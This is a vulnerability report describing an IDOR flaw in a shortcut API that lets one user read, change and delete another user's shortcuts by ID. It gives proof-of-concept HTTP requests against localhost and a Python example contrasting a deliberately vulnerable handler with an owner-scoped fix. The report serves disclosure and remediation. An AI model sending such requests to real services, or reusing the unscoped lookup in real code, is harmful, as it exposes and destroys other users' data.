
IDOR allows viewing, updating and deleting other users' shortcuts

# Description
Although the endpoint /api/shortcut only lists your own shortcuts, other users' shortcuts can be read, modified and deleted by addressing them directly by ID.

# Proof of Concept
– Log in as one user and create a shortcut; assume it is assigned the ID 1
– Log in as another user

Now you can access the first user's shortcut with:
```
GET /api/shortcut/1 HTTP/1.1
Host: localhost:5230
```
You can also delete it:
```
DELETE /api/shortcut/1 HTTP/1.1
Host: localhost:5230
```
And update it:
```
PATCH /api/shortcut/1 HTTP/1.1
Host: localhost:5230

{"id":1,"title":"changed 2","payload":"[]"}
```
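As an added example (not code from the report or from the affected application), the following Python sketch shows the lookup pattern behind this bug beside the fix: the vulnerable handler fetches a shortcut by its ID alone, whereas the fixed handlers scope every lookup to the authenticated user and ignore any `id` field carried in the PATCH body. The data model, the user IDs, the in-memory store and the function names are assumptions made for illustration.

```python
"""Ownership check for /api/shortcut/<id>.

Added example, not the reported application's code. The vulnerable
handler looks up a shortcut by primary key only; the fixed handlers
scope the lookup to the authenticated user.
"""
from dataclasses import dataclass


@dataclass
class Shortcut:
    id: int
    owner_id: int
    title: str
    payload: str = "[]"


# Constructed sample data: two users (assumed IDs 100 and 200), one
# shortcut each. A real service would back this with a database.
SHORTCUTS = {
    1: Shortcut(id=1, owner_id=100, title="alice's shortcut"),
    2: Shortcut(id=2, owner_id=200, title="bob's shortcut"),
}


def vulnerable_get(current_user_id: int, shortcut_id: int):
    """Reproduces the bug: the row is fetched by ID alone, so any
    authenticated user can read any shortcut. Returns (status, row)."""
    row = SHORTCUTS.get(shortcut_id)
    if row is None:
        return 404, None
    return 200, row


def _owned_shortcut(current_user_id: int, shortcut_id: int):
    """Scoped lookup: a shortcut owned by someone else is treated exactly
    like a missing one, so the response does not reveal that the ID exists."""
    row = SHORTCUTS.get(shortcut_id)
    if row is None or row.owner_id != current_user_id:
        return None
    return row


def secure_get(current_user_id: int, shortcut_id: int):
    row = _owned_shortcut(current_user_id, shortcut_id)
    if row is None:
        return 404, None
    return 200, row


def secure_patch(current_user_id: int, shortcut_id: int, body: dict):
    row = _owned_shortcut(current_user_id, shortcut_id)
    if row is None:
        return 404, None
    # Never trust an "id" in the body: the path parameter, already checked
    # for ownership, is the only identifier used. Only known fields are
    # copied over, so the body cannot reassign owner_id either.
    for key in ("title", "payload"):
        if key in body:
            setattr(row, key, body[key])
    return 200, row


def secure_delete(current_user_id: int, shortcut_id: int):
    row = _owned_shortcut(current_user_id, shortcut_id)
    if row is None:
        return 404, None
    del SHORTCUTS[shortcut_id]
    return 204, None
```

The check lives in one helper so that GET, PATCH and DELETE cannot drift apart; returning 404 rather than 403 for another user's resource also avoids turning the endpoint into an ID oracle.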
